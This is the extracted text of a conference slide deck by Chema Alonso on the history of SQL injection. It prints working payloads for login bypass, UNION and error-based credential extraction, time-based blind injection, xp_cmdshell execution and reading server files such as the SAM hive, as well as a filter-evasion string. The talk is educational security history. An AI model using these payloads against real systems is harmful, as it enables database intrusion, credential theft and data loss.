chema alonso

8/10/2019 Chema Alonso

1/51

Feliz 15 aniversario, SQL Injection!


2/51

What this talk is not about?


3/51



4/51



5/51

This is about Love


6/51

Los Amantes del Crculo Polar


7/51

25Dec1998: El nacimiento

http://www.phrack.org/issues.html?id=8&issue=54
http://www.phrack.org/issues.html?id=8&issue=54http://www.phrack.org/issues.html?id=8&issue=54


8/51

Begining


9/51

Tautology

q=Select uid from users where uid=+$user+ and pass=+pass+;

admin

or 1=1

q=Select uid from users where uid=admin and pass= or 1=1;


10/51

14Aug2007: IBM

http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability


11/51

Place


12/51

Inband

-1 union select 1,1,1,1,username,1,a,1 from users --


13/51

2001 - OutBand

http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.dochttp://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.dochttp://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.dochttp://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.dochttp://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.dochttp://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc


14/51

Yesterday - [Microsoft][ODBC SQL Server Driver]

[SQL Server]Incorrect syntax near the keyword 'or'.

q=Select title from noticias where ud=+$id+;

Id=1 or 1=(select top 1 username from sysusers) --


15/51

Jul2007: Microsoft Partner Programme


16/51

2002Advanced SQL Injection Techniques

https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf


17/51

Advanced Tricks

Id= 1; shutdown --

Username: '; begin declare @ret varchar(8000) set @ret=':' select

@ret=@ret+' '+username+'/'+password from users where username>@ret

select @ret as ret into foo end--

Username: ' union select ret,1,1,1 from foo--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ': admin/r00tr0x! guest/guest chris/password

fred/sesame' to a column of data type int.

exec master..xp_cmdshell 'dir'


18/51

27Mar - 2007


19/51

Outter Bands

DNS Queries

FTP Sites

SMB Files

Remote DB

Web Files

Log Files


20/51

Eyes of Fear


21/51

2002 - Blind

http://server/miphp.php?id=1 and 1=1

http://server/miphp.php?id=1 and 1=0

True

False


22/51

2010US Army


23/51

2010US Army


24/51

Time


25/51

2002Time Based Blind SQL Injection

http://www.northernfortress.net/more_advanced_sql_injection.pdf
http://www.northernfortress.net/more_advanced_sql_injection.pdfhttp://www.northernfortress.net/more_advanced_sql_injection.pdf


26/51

(more) Advanced Tricks

if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'

ping -n 10 127.0.0.1


27/51

2004Time-Based in Other Databases

SQL Server

1) ; if wait for delay

2) ; exec xp_cmdshell (pingn)

Oracle

1) dms_lock.sleep()

PL/SLQ Injection

MySQL1) and sleep()

5.0 or higher

2) Benchmarck functions

Postgres:

1) pg:sleep()


28/51

Jun2007 : Solar Empire Exploit

http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html


29/51

Apr2013: Yahoo!

http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--

http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html


30/51

2007Time-Based SQL Injection using Heavy Queries

https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf


31/51

Time-Based Using Heavy Queries in MS Access

True

False


32/51

Deep Blind SQL Injection

http://labs.portcullis.co.uk/application/deep-blind-sql-injection
http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/


33/51

Ace


34/51

Serialized SQL Injection

union select '1','2','3',(select * from sysusers for xml raw, binary base64)

pass=


35/51

Inverted Queries - Lefties

q=Select uid from users where +$user+=user and +pass+ pass;


36/51

Airthmetic Blind SQL Injection

Id=A+(1/(ASCII(B)-C))

Id=A+ASCII(B)-C

Id=A+((C/ASCII(B))*(K))


37/51

RFD (Remote File Downloading)SQL Server 2K

And 200>ASCII (SUBSTRING(SELECT * FROM

OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt;

*.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt),1,1))

; Create Table TempTable as (row varchar(8000)) --

; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n',

ROWTERMINATOR = '\n) --

; alter table TempTable add num int IDENTITY(1,1) NOT NULL

and (select COUNT(row) from TempTable)

and (select top 1 len(row) from TempTable where num = rownum)

and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num

= 1)

; Drop Table TempTable--


38/51

RFD (Remote File Downloading)SQL Server 2K5++

AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK

'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))


39/51

RFD (Remote File Downloading)MySQL

LoadFile

SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

Load Data infile

; Create table C8DFC643 (datos varchar(4000))

; Load data infile 'c:\\boot.ini' into table C8DFC643

; alter table C8DFC643 add column num integer auto_incrementunique key

and (select count(num) from C8DFC643) and (select length(datos) from C8DFC643 where num = 1)

and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)

; Drop table C8DFC643


40/51

RFD (Remote File Downloading)Oracle

External Tables & Plain Text Files

; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; -- ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization

external (TYPE ORACLE_LOADER default directory A4A9308C access parameters (

records delimited by newline ) location (''boot.ini''))'; end;--

DBMS_LOB

; execute immediate DECLARE l_bfile BFILE;

l_blob BLOB;

BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO

l_blob;

l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');

DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));

DBMS_LOB.fileclose(l_bfile);

COMMIT;

EXCEPTION

WHEN OTHERS THEN ROLLBACK;

END;

; end; --


41/51

CSRF+SQLi


42/51

Smuggling

/**/aNd/**/1=aSC(substr(user(),1,1))%00


43/51

Braveness


44/51

Connection String Parameter Pollution

http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdf
http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdf


45/51

XPath Injection

http://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf
http://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdfhttp://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdfhttp://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdfhttp://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf


46/51

LDAP Injection

http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf


47/51

OWASP TOP 10 - 2013


48/51

Forbidden

q=Select uid from users where uid=+$user+ and pass=+pass+;


49/51

Use Brain not tech

PHP Magic Quotes? -> id=1 and 1=1

Python? -> No invulnerable

.NET? -> No invulnerable

LinQ? -> No invulnerable


50/51

Fixing Code Injections isnt the worst job


51/51

More

@chemaalonso

http://www.elladodelmal.com
http://www.elladodelmal.com/http://www.elladodelmal.com/http://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.html

chema alonso

Documents